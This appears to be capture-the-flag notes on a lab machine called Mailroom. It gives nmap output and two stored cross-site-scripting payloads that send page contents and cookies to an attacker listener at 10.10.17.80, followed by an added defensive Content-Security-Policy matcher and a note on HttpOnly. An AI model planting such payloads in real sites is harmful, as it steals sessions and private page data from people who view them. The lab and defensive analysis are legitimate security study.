22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 94bb2ffcaeb9b182afd789811aa76ce5 (RSA)
| 256 821beb758b9630cf946e7957d9ddeca7 (ECDSA)
|_ 256 19fb45feb9e4275de5bbf35497dd68cf (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: The Mail Room
git.mailroom.htb and mailroom.htb
There is some 2FA mechanism on the git site.
Auto-submitting form:
<form id="autosubmit" action="http://10.10.17.80:8081" enctype="text/plain" method="POST">
  <input id="1" name="1" type="hidden" />
  <input id="2" name="2" type="hidden" />
  <input type="submit" value="Submit Request" />
</form>
<script>
  // Copy the rendered page body and the script-readable cookies into the hidden fields.
  document.getElementById("1").value = JSON.stringify(document.body.innerHTML);
  document.getElementById("2").value = JSON.stringify(document.cookie);
  // Submitting the form navigates the viewer's browser to the form action.
  document.getElementById("autosubmit").submit();
</script>
The inquiry persists for a while, even after it has been viewed.
Let's use AJAX so the person isn't redirected.
wget our own copy of https://code.jquery.com/jquery-3.6.0.min.js and host it on 999:
<script src="http://10.10.17.80:9999/jquery-3.6.0.min.js"></script>
<script>
  $(document).ready(function() {
    // First request: synchronous POST; the response body is kept in `result`.
    var result = $.ajax({
      url: 'http://10.10.17.80:8081',
      method: 'POST',
      cache: false,
      async: false,
      data: {'bruh': 'bruh'},
      success: function(response) {
        console.log("Success 1");
      },
      error: function(data) {
        console.log("Fail 1");
        console.log(data.responseText);
      }
    }).responseText;

    // Second request: POST `result` back to the same listener.
    $.ajax({
      url: 'http://10.10.17.80:8081',
      method: 'POST',
      cache: false,
      data: {'2ndpost': result},
      async: false,
      success: function(response) {
        console.log("Success 2");
      },
      error: function(data) {
        console.log("Fail 2");
        console.log(data.responseText);
      }
    });
  });
</script>
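Read from the defending side, each step of the two payloads above needs the browser to permit something that a Content-Security-Policy header on the page showing the inquiry can refuse. The following is an added example, not part of the original notes: the origins are constructed, and the matcher is a simplified stand-in for a browser's CSP logic that shows which steps a given policy still lets through.

```javascript
// Added example, not from the original notes. Simplified CSP matcher: it
// understands only 'self', 'none', '*', 'unsafe-inline' and exact origins.
const SELF = 'http://app.example';          // assumed origin of the inquiry viewer
const OFFSITE = 'http://collector.example'; // constructed stand-in for the off-origin host

// What the two payloads need the browser to permit, and the directive that decides it.
const PAYLOAD_NEEDS = [
  { what: 'inline script', directive: 'script-src', source: "'unsafe-inline'" },
  { what: 'off-origin script src', directive: 'script-src', source: OFFSITE },
  { what: 'off-origin form action', directive: 'form-action', source: OFFSITE },
  { what: 'off-origin ajax POST', directive: 'connect-src', source: OFFSITE },
];

// form-action is not a fetch directive, so default-src never covers it.
const FALLS_BACK = new Set(['script-src', 'connect-src']);

// Parse a header value into directive -> source list; the first duplicate wins.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !policy.has(key)) policy.set(key, sources);
  }
  return policy;
}

function allowed(policy, directive, source) {
  let list = policy.get(directive);
  if (list === undefined && FALLS_BACK.has(directive)) list = policy.get('default-src');
  if (list === undefined) return true; // nothing governs this action
  if (source === "'unsafe-inline'") return list.includes(source);
  if (list.includes("'none'")) return false;
  return list.includes('*') || list.includes(source) ||
    (source === SELF && list.includes("'self'"));
}

// Names of the payload steps that a given policy would still let through.
function survivors(header) {
  const policy = parseCsp(header);
  return PAYLOAD_NEEDS
    .filter((need) => allowed(policy, need.directive, need.source))
    .map((need) => need.what);
}

for (const csp of ['', "default-src 'self'", "default-src 'self'; form-action 'self'"]) {
  console.log(JSON.stringify(csp), '->', survivors(csp));
}
```

The `document.cookie` read in the first payload is governed by a separate control: a session cookie set with the `HttpOnly` attribute is not visible to script at all.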